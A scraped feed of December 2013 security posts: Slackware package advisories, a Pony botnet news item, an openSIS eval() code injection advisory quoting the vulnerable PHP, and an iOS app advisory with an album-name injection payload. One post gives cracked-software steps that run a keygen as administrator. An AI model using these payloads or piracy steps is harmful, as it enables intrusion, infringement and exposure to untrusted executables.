 # upgradepkg seamonkey-2.22.1-i486-1_slack14.1.txz seamonkey-solibs-2.22.1-i486-1_slack14.1.txz
 
 
 +-----+
 
 Slackware Linux Security Team
 <a href="http://slackware.com/gpg-key">http://slackware.com/gpg-key</a>
 <a href="mailto:security@slackware.com">security@slackware.com</a>
 
 +------------------------------------------------------------------------+
 | To leave the slackware-security mailing list: |
 +------------------------------------------------------------------------+
 | Send an email to <a href="mailto:majordomo@slackware.com">majordomo@slackware.com</a> with this text in the body of |
 | the email message: |
 | |
 | unsubscribe slackware-security |
 | |
 | You will get a confirmation message back containing instructions to |
 | complete the process. Please do not reply to this email address. |
 +------------------------------------------------------------------------+
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.4.15 (GNU/Linux)
 
 iEYEARECAAYFAlKhGK4ACgkQakRjwEAQIjOKNwCeM22go773N6aGqZPgjMaSc0xi
 DpQAn2NsPT3B1PK2svYl9qAHmggSQkkD
 =lQct
 -----END PGP SIGNATURE-----

[slackware-security] seamonkey (SSA:2013-339-03)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] seamonkey (SSA:2013-339-03) New seamonkey packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here…

05 Dec 2013

[slackware-security] mozilla-thunderbird (SSA:2013-339-02)

-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
 [slackware-security] mozilla-thunderbird (SSA:2013-339-02)
 
 New mozilla-thunderbird packages are available for Slackware 13.37, 14.0, 14.1,
 and -current to fix security issues.
 
 
 Here are the details from the Slackware 14.1 ChangeLog:
 +--------------------------+
 patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz: Upgraded.
 This release contains security fixes and improvements.
 For more information, see:
 <a href="http://www.mozilla.org/security/known-vulnerabilities/thunderbird.html">http://www.mozilla.org/security/known-vulnerabilities/thunderbird.html</a>
 (* Security fix *)
 +--------------------------+
 
 
 Where to find the new packages:
 +-----------------------------+
 
 Thanks to the friendly folks at the OSU Open Source Lab
 (<a href="http://osuosl.org">http://osuosl.org</a>) for donating FTP and rsync hosting
 to the Slackware project! :-)
 
 Also see the "Get Slack" section on <a href="http://slackware.com">http://slackware.com</a> for
 additional mirror sites near you.
 
 Updated package for Slackware 13.37:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz">ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz</a>
 
 Updated package for Slackware x86_64 13.37:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz</a>
 
 Updated package for Slackware 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz</a>
 
 Updated package for Slackware x86_64 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz</a>
 
 Updated package for Slackware 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz</a>
 
 Updated package for Slackware x86_64 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz</a>
 
 Updated package for Slackware -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.1-i486-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.1-i486-1.txz</a>
 
 Updated package for Slackware x86_64 -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.1-x86_64-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.1-x86_64-1.txz</a>
 
 
 MD5 signatures:
 +-------------+
 
 Slackware 13.37 package:
 4c7fe2a313a7b98c8a33f1c6d0c953ad mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz
 
 Slackware x86_64 13.37 package:
 1f33fbe3e18e0fbaf1190569fb9f8b9e mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz
 
 Slackware 14.0 package:
 8c2c55219d568e4cff9eda91b883f658 mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz
 
 Slackware x86_64 14.0 package:
 b254f06d541562be63511312118400a4 mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz
 
 Slackware 14.1 package:
 50fbdd06e503a5220e130927ae0e9171 mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz
 
 Slackware x86_64 14.1 package:
 eb7196ac604d9fba90b8f71bc29ae0f9 mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz
 
 Slackware -current package:
 4d2efed242da82ead7a3c19d19000aaa xap/mozilla-thunderbird-24.1.1-i486-1.txz
 
 Slackware x86_64 -current package:
 7c40c6f86cec219dee61370fb1bfe007 xap/mozilla-thunderbird-24.1.1-x86_64-1.txz
 
 
 Installation instructions:
 +------------------------+
 
 Upgrade the package as root:
 # upgradepkg mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz
 
 
 +-----+
 
 Slackware Linux Security Team
 <a href="http://slackware.com/gpg-key">http://slackware.com/gpg-key</a>
 <a href="mailto:security@slackware.com">security@slackware.com</a>
 
 +------------------------------------------------------------------------+
 | To leave the slackware-security mailing list: |
 +------------------------------------------------------------------------+
 | Send an email to <a href="mailto:majordomo@slackware.com">majordomo@slackware.com</a> with this text in the body of |
 | the email message: |
 | |
 | unsubscribe slackware-security |
 | |
 | You will get a confirmation message back containing instructions to |
 | complete the process. Please do not reply to this email address. |
 +------------------------------------------------------------------------+
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.4.15 (GNU/Linux)
 
 iEYEARECAAYFAlKhGKwACgkQakRjwEAQIjPqqwCfbBsfXUQLQyE20YRaXGx+Dr9+
 JuwAoIP/KrWPV1sUiBvmC1ReMcMIbBWm
 =o4//
 -----END PGP SIGNATURE-----

[slackware-security] mozilla-thunderbird (SSA:2013-339-02)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] mozilla-thunderbird (SSA:2013-339-02) New mozilla-thunderbird packages are available for Slackware 13.37, 14.0, 14.1, and -current t…

05 Dec 2013

[slackware-security] mozilla-nss (SSA:2013-339-01)

-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 
 [slackware-security] mozilla-nss (SSA:2013-339-01)
 
 New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current
 to fix security issues.
 
 
 Here are the details from the Slackware 14.1 ChangeLog:
 +--------------------------+
 patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz: Upgraded.
 This update contains security fixes and improvements.
 For more information, see:
 <a href="http://www.mozilla.org/security/announce/2013/mfsa2013-103.html">http://www.mozilla.org/security/announce/2013/mfsa2013-103.html</a>
 (* Security fix *)
 +--------------------------+
 
 
 Where to find the new packages:
 +-----------------------------+
 
 Thanks to the friendly folks at the OSU Open Source Lab
 (<a href="http://osuosl.org">http://osuosl.org</a>) for donating FTP and rsync hosting
 to the Slackware project! :-)
 
 Also see the "Get Slack" section on <a href="http://slackware.com">http://slackware.com</a> for
 additional mirror sites near you.
 
 Updated package for Slackware 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.0.txz</a>
 
 Updated package for Slackware x86_64 14.0:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.0.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.0.txz</a>
 
 Updated package for Slackware 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz</a>
 
 Updated package for Slackware x86_64 14.1:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.1.txz</a>
 
 Updated package for Slackware -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.15.3-i486-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.15.3-i486-1.txz</a>
 
 Updated package for Slackware x86_64 -current:
 <a href="ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.15.3-x86_64-1.txz">ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.15.3-x86_64-1.txz</a>
 
 
 MD5 signatures:
 +-------------+
 
 Slackware 14.0 package:
 c5d7e5b5b46bedae785d22d0247d70ad mozilla-nss-3.15.3-i486-1_slack14.0.txz
 
 Slackware x86_64 14.0 package:
 f29e0973d99829c08038193b65b5b4b3 mozilla-nss-3.15.3-x86_64-1_slack14.0.txz
 
 Slackware 14.1 package:
 9f95b21dc109db67f8e7906521bab61b mozilla-nss-3.15.3-i486-1_slack14.1.txz
 
 Slackware x86_64 14.1 package:
 9f853af467fe81e70bf820677b45c4ad mozilla-nss-3.15.3-x86_64-1_slack14.1.txz
 
 Slackware -current package:
 e90376f0a0b99c8924ddb39d27775e8c l/mozilla-nss-3.15.3-i486-1.txz
 
 Slackware x86_64 -current package:
 95bfee53e035ae57557e150788b83290 l/mozilla-nss-3.15.3-x86_64-1.txz
 
 
 Installation instructions:
 +------------------------+
 
 Upgrade the package as root:
 # upgradepkg mozilla-nss-3.15.3-i486-1_slack14.1.txz
 
 
 +-----+
 
 Slackware Linux Security Team
 <a href="http://slackware.com/gpg-key">http://slackware.com/gpg-key</a>
 <a href="mailto:security@slackware.com">security@slackware.com</a>
 
 +------------------------------------------------------------------------+
 | To leave the slackware-security mailing list: |
 +------------------------------------------------------------------------+
 | Send an email to <a href="mailto:majordomo@slackware.com">majordomo@slackware.com</a> with this text in the body of |
 | the email message: |
 | |
 | unsubscribe slackware-security |
 | |
 | You will get a confirmation message back containing instructions to |
 | complete the process. Please do not reply to this email address. |
 +------------------------------------------------------------------------+
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.4.15 (GNU/Linux)
 
 iEYEARECAAYFAlKhGKoACgkQakRjwEAQIjMw8QCggSmImM4YAHsr+e8hI0lbJWh3
 XDUAn0SdI1Tq9BYeICGQ4noDkypcGIRm
 =d02G
 -----END PGP SIGNATURE-----

[slackware-security] mozilla-nss (SSA:2013-339-01)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [slackware-security] mozilla-nss (SSA:2013-339-01) New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current to fix security issues. …

05 Dec 2013

Download Bandicam 1.9.2.455 Include Crack

:hai 
kali ini saya share software Desktop Recorder, apa itu ? :panik 
adalah sebuah software yang bisa merekam aktifitas kita di kompi, dalam bentuk video.. 
software ini biasanya digunakan untuk membuat video tutorial :) 
 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.bandicam.com/downloads/bandicam_eng.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="http://www.bandicam.com/downloads/bandicam_eng.gif" width="320" /></a></div>
Download: <a href="http://adf.ly/dpkp9" rel="nofollow" target="_blank">>>>> DISINI <<<<</a> 
 
Tutor: 
1. Install Bandicam sampai selesai 
2. Aktivasi dengan crack 
 
 
<blockquote class="tr_bq">
1. Copy semua yg ada di Crack.rar ke folder Installan Bandicam (default di C:/Program Files/Bandicam) 
2. Klik kanan keymaker.exe > Run as Administrator 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://x.tuspics.net/img/i/00110/9biouceqyx5d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="http://x.tuspics.net/img/i/00110/9biouceqyx5d.png" width="320" /></a></div>
3. Isi email, terserah mau email asli, bajakan, KW, dummy, apapun :ngakak 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://x.tuspics.net/img/i/00110/m86zheidwneb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="http://x.tuspics.net/img/i/00110/m86zheidwneb.png" width="320" /></a></div>
4. Lalu klik Register application! 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://x.tuspics.net/img/i/00110/wd96ertsy8jr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="http://x.tuspics.net/img/i/00110/wd96ertsy8jr.png" width="320" /></a></div>
</blockquote>
 
3. Enjoy! 
<div class="separator" style="clear: both; text-align: center;">
<a href="http://x.tuspics.net/img/i/00110/xut1anj91kxx.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="http://x.tuspics.net/img/i/00110/xut1anj91kxx.png" width="320" /></a></div>

Download Bandicam 1.9.2.455 Include Crack

:hai kali ini saya share software Desktop Recorder, apa itu ? :panik adalah sebuah software yang bisa merekam aktifitas kita di kompi, dalam bentuk video.. software ini biasanya digunakan untuk membua…

05 Dec 2013

Hackers steal 2 Million Facebook, Gmail, twitter accounts with Pony Botnet

<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZErsmNvIuUlwRYuTRvK_5l-6ZEmxsMi8JAW_BbJjUBCK4c-H9GqyB6gEgfSuetsepcKz0psCXo3RMvCKsHEvD3NCSFHhwm5mA1rLgmDG5ytPrMQJMzaH9PF7YmmX7o722F10mHp1M600/s640/Pony-botnet-steals-2-million-passwords.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZErsmNvIuUlwRYuTRvK_5l-6ZEmxsMi8JAW_BbJjUBCK4c-H9GqyB6gEgfSuetsepcKz0psCXo3RMvCKsHEvD3NCSFHhwm5mA1rLgmDG5ytPrMQJMzaH9PF7YmmX7o722F10mHp1M600/s320/Pony-botnet-steals-2-million-passwords.jpg" width="320" /></a></div>
Cyber criminals have stolen more than two Million facbeook, Gmail, Twitter, Linkedin and yahoo accounts with the help of Pony malware, according to report from Trustwave. Security researchers at Trustwave gained access to the admin control panel of the "Pony botnet" which is storing a large amount stolen credentials from the infected machines. According to their report, around 1,580,000 website login credentials, 320,000 email credentials, 41,000 FTP credentials were stolen. Sponsored Links Approximately 318121 facebook , 59549 yahoo, 54437 Google, 21708 Twitter login credentials were affected. The most commonly used password is appeared to be the unsurprisingly the weakest one.  As usual, '123456' password keep it's position in the top.  The second & third is '123456789' and '1234' respectively. Facebook, Linkedin, Twitter and other services is reportedly resetting the account's passwords.

Hackers steal 2 Million Facebook, Gmail, twitter accounts with Pony Botnet

Cyber criminals have stolen more than two Million facbeook, Gmail, Twitter, Linkedin and yahoo accounts with the help of Pony malware, according to report from Trustwave.Security researchers at Trust…

05 Dec 2013

Download Ebook Web Penetration Testing with Kali Linux

<div class="separator" style="clear: both; text-align: center;">
<a href="http://it-ebooks.info/images/ebooks/14/web_penetration_testing_with_kali_linux.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://it-ebooks.info/images/ebooks/14/web_penetration_testing_with_kali_linux.jpg" /></a></div>
 
<table style="width: 100%px;"><tbody>
<tr><td width="150">Publisher:</td><td><a href="http://it-ebooks.info/publisher/14/" itemprop="publisher" title="Packt Publishing eBooks">Packt Publishing</a></td></tr>
<tr><td>By:</td><td><a href="http://it-ebooks.info/author/3769/" title="Joseph Muniz">Joseph Muniz</a>, <a href="http://it-ebooks.info/author/3770/" title="Aamir Lakhani">Aamir Lakhani</a></td></tr>
<tr><td>ISBN:</td><td>978-1-78216-316-9</td></tr>
<tr><td>Year:</td><td>2013</td></tr>
<tr><td>Pages:</td><td>342</td></tr>
<tr><td>Language:</td><td>English</td></tr>
<tr><td>File size:</td><td>21.2 MB</td></tr>
<tr><td>File format:</td><td>PDF</td><td></td><td></td><td></td><td></td><td></td></tr>
</tbody></table>
 
Index of / 
<blockquote class="tr_bq">
Chapter 1: Penetration Testing and Setup Chapter 2: Reconnaissance Chapter 3: Server-side Attacks Chapter 4: Client-side Attacks Chapter 5: Attacking Authentication Chapter 6: Web Attack Chapter 7: Defensive Countermeasures Chapter 8: Penetration Test Executive Report</blockquote>
<a href="http://adf.ly/dpktL" target="_blank">Download</a> 
:bye

Download Ebook Web Penetration Testing with Kali Linux

Publisher:Packt Publishing By:Joseph Muniz, Aamir Lakhani ISBN:978-1-78216-316-9 Year:2013 Pages:342 Language:English File size:21.2 MB File format:PDF Index of / Chapter 1: Penetration Testing and S…

05 Dec 2013

[KIS-2013-10] openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability

----------------------------------------------------------
 openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
 ----------------------------------------------------------
 
 
 [-] Software Link:
 
 <a href="http://www.opensis.com/">http://www.opensis.com/</a>
 
 
 [-] Affected Versions:
 
 All versions from 4.5 to 5.2.
 
 
 [-] Vulnerability Description:
 
 The vulnerable code is located in the /ajax.php script:
 
 86.	if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
 87.	{
 88.		if($_REQUEST['_openSIS_PDF']=='true')
 89.			ob_start();
 90.		if(strpos($_REQUEST['modname'],'?')!==false)
 91.		{
 92.			$vars = 
 substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
 93.			$modname = 
 substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
 94.
 95.			$vars = explode('?',$vars);
 96.			foreach($vars as $code)
 97.			{
 98.				$code = 
 decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';");
 99.				eval($code);
 100.			}
 101.		}
 
 User input passed through the "modname" request variable is not 
 properly sanitized before being used in
 a call to the eval() function at line 99. This can be exploited to 
 inject and execute arbitrary PHP code.
 
 
 [-] Solution:
 
 As of December 5th, 2013 the only solution is this patch: 
 <a href="http://sourceforge.net/p/opensis-ce/code/1009">http://sourceforge.net/p/opensis-ce/code/1009</a>
 
 
 [-] Disclosure Timeline:
 
 [04/12/2012] - Issue reported to <a href="http://sourceforge.net/p/opensis-ce/bugs/59/[28/12/2012">http://sourceforge.net/p/opensis-ce/bugs/59/
 [28/12/2012</a>] - Vendor contacted, replied that the next version will 
 fix the issue
 [12/01/2013] - CVE number requested
 [14/01/2013] - CVE number assigned
 [26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
 [12/05/2013] - Vendor contacted again
 [15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
 [04/12/2013] - After one year still no official solution available
 
 
 [-] CVE Reference:
 
 The Common Vulnerabilities and Exposures project (<a href="http://cve.mitre.org">cve.mitre.org</a>)
 has assigned the name CVE-2013-1349 to this vulnerability.
 
 
 [-] Credits:
 
 Vulnerability discovered by Egidio Romano.
 
 
 [-] Original Advisory:
 
 <a href="http://karmainsecurity.com/KIS-2013-10">http://karmainsecurity.com/KIS-2013-10</a>

[KIS-2013-10] openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability

---------------------------------------------------------- openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability ---------------------------------------------------------- [-] Software Link: http…

05 Dec 2013

Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities

Document Title:
 ===============
 Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities
 
 
 References (Source):
 ====================
 <a href="http://www.vulnerability-lab.com/get_content.php?id=1152">http://www.vulnerability-lab.com/get_content.php?id=1152</a>
 
 
 Release Date:
 =============
 2013-12-04
 
 
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 1152
 
 
 Common Vulnerability Scoring System:
 ====================================
 6.7
 
 
 Product & Service Introduction:
 ===============================
 Wireless Transfer App is an easy to use photo and video transfer tool. It helps you easily and quickly transfer photos and videos 
 between iPhone and iPad, as well as transfer photos and videos from computer to iPad/iPhone/iPod and vice verse. With Wireless 
 Transfer App, you can transfer photos and videos from iPad to iPad, from iPad to iPhone, from iPhone to iPad, from iPhone to iPhone, 
 from computer to iPad, from iPhone to computer and more. There is no need for USB cable or extra software. You just need to put your 
 devices under the same Wi-Fi network.
 
 (Copy of the Homepage: <a href="https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010">https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010</a> & <a href="http://www.wirelesstransferapp.com/">http://www.wirelesstransferapp.com/</a> )
 
 
 Abstract Advisory Information:
 ==============================
 The Vulnerability Laboratory Research Team discovered multiple command/path inject vulnerabilities in the Wireless Transfer App v3.7 for apple iOS.
 
 
 Vulnerability Disclosure Timeline:
 ==================================
 2012-11-30:	Public Disclosure (Vulnerability Laboratory)
 
 
 Discovery Status:
 =================
 Published
 
 
 Affected Product(s):
 ====================
 Wireless Transfer App COM
 Product: Wireless Transfer App 3.7
 
 
 Exploitation Technique:
 =======================
 Remote
 
 
 Severity Level:
 ===============
 High
 
 
 Technical Details & Description:
 ================================
 A local command/path injection web vulnerability has been discovered in the Wireless Transfer App v3.7 for apple iOS.
 The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
 
 The vulnerability is located in the in the album name value of the wireless transfer app index and sub category list module.
 Remote attackers are able to manipulate iOS device - `photo app` (default) album names. The execute of the injected 
 command/path request occurs in the album sub category list and the main album name index list. The security risk of the 
 command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.7(-).
 
 Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access 
 and no direct user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific 
 commands or unauthorized path requests.
 
 Vulnerable Application(s):
 				[+] Wireless Transfer App v3.7
 
 Vulnerable Parameter(s):
 				[+] album name
 				[+] photoGallery_head - album
 
 Affected Module(s):
 				[+] Index - Album Name List
 				[+] Sub Category - Title Album Name List
 
 
 Proof of Concept (PoC):
 =======================
 The local command inject web vulnerabilities can be exploited by local low privileged device user accounts with low 
 user interaction. For security demonstration or to reproduce the vulnerability follow the information and steps below. 
 
 Manual steps to exploit the vulnerability ...
 
 1. Install the wireless transfer v3.7 iOS mobile application
 2. Open the default Photo app of your iOS device
 3. Include an album with the following payload `">%20<x src=\..\<../var/mobile/Library/[x application path]>` and save it
 4. Switch back to the installed wireless transfer app and start the wifi transfer
 5. Open the local web-server url <a href="http://localhost:6688/">http://localhost:6688/</a> (default link)
 6. The local path/command execute occurs in the album name value of the photoGallery_head class
 7. Successful reproduce of the vulnerability! 
 
 
 PoC: Album Name - photoGallery_head in the Album Sub Category List
 
 <div class="header">
 <div class="logo"> <a href="index.html"><img src="images/logo.png" alt="logo"></a> </div>
 <div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"></a></div>
 <div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=" "></a></div>
 <div class="photoGallery_head">
 <div class="phga_hd_left">Album : ">%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]></div>
 <div class="phga_hd_right">
 <input value="Zurück zur Sammlung" class="back" type="button">
 </div>
 </div>
 </div>
 
 
 PoC: Album Name - photoalbum in the Album Index List
 
 <div class="photo_list">
 <dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
 <img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"></a></dt>
 <dd>>%20<x src=\..\<../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoalbum!]>(125)</dd></dl> 
 <dl><dt class="photoalbum" alt="632F9F75-1B7A-41E4-8070-E62B1ECC780A"><a href="albumhtm?id=632F9F75-1B7A-41E4-8070-E62B1ECC780A">
 <img src="/albumimg_632F9F75-1B7A-41E4-8070-E62B1ECC780A.jpg" height="100" width="100"></a></dt><dd>Fotoarchiv(0)</dd></dl> 
 <dl><dt class="photoalbum" alt="C44B3062-3A67-4BFA-AF16-04CC8DE2CD29"><a href="albumhtm?id=C44B3062-3A67-4BFA-AF16-04CC8DE2CD29">
 <img src="/albumimg_C44B3062-3A67-4BFA-AF16-04CC8DE2CD29.jpg" height="100" width="100"></a></dt><dd>WallpapersHD(3)</dd></dl> 
 
 
 Reference(s):
 <a href="http://localhost:6688/index.html">http://localhost:6688/index.html</a>
 <a href="http://localhost:6688/albumhtm">http://localhost:6688/albumhtm</a>
 <a href="http://localhost:6688/albumhtm?id=">http://localhost:6688/albumhtm?id=</a>
 <a href="http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">http://localhost:6688/albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C</a>
 
 
 Solution - Fix & Patch:
 =======================
 The vulnerability can be patched by a secure encode and parse of the vulnerable album name value. 
 Parse and filter also the index and sub category output list to ensure it prevents local command/path requests.
 
 
 Security Risk:
 ==============
 The security risk of the local command/path inject web vulnerability is estimated as high.
 
 
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (<a href="mailto:bkm@evolution-sec.com">bkm@evolution-sec.com</a>) [<a href="http://www.vulnerability-lab.com">www.vulnerability-lab.com</a>]
 
 
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
 either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
 Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
 profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
 states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
 may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
 or trade with fraud/stolen material.
 
 Domains: <a href="http://www.vulnerability-lab.com">www.vulnerability-lab.com</a> 	- <a href="http://www.vuln-lab.com">www.vuln-lab.com</a>			 - <a href="http://www.evolution-sec.com">www.evolution-sec.com</a>
 Contact: <a href="mailto:admin@vulnerability-lab.com">admin@vulnerability-lab.com</a> 	- <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a> 	 - <a href="mailto:admin@evolution-sec.com">admin@evolution-sec.com</a>
 Section: <a href="http://www.vulnerability-lab.com/dev">www.vulnerability-lab.com/dev</a> 	- <a href="http://forum.vulnerability-db.com">forum.vulnerability-db.com</a> 		 - <a href="http://magazine.vulnerability-db.com">magazine.vulnerability-db.com</a>
 Social:	 <a href="http://twitter.com/#!/vuln_lab">twitter.com/#!/vuln_lab</a> 		- <a href="http://facebook.com/VulnerabilityLab">facebook.com/VulnerabilityLab</a> 	 - <a href="http://youtube.com/user/vulnerability0lab">youtube.com/user/vulnerability0lab</a>
 Feeds:	 <a href="http://vulnerability-lab.com/rss/rss.php">vulnerability-lab.com/rss/rss.php</a>	- <a href="http://vulnerability-lab.com/rss/rss_upcoming.php">vulnerability-lab.com/rss/rss_upcoming.php</a> - <a href="http://vulnerability-lab.com/rss/rss_news.php">vulnerability-lab.com/rss/rss_news.php</a>
 
 Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
 media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
 other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
 modify, use or edit our material contact (<a href="mailto:admin@vulnerability-lab.com">admin@vulnerability-lab.com</a> or <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a>) to get a permission.
 
 				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
 
 
 
 -- 
 VULNERABILITY LABORATORY RESEARCH TEAM
 DOMAIN: <a href="http://www.vulnerability-lab.com">www.vulnerability-lab.com</a>
 CONTACT: <a href="mailto:research@vulnerability-lab.com">research@vulnerability-lab.com</a>

Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities

Document Title: =============== Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1152 Release …

05 Dec 2013

Load more posts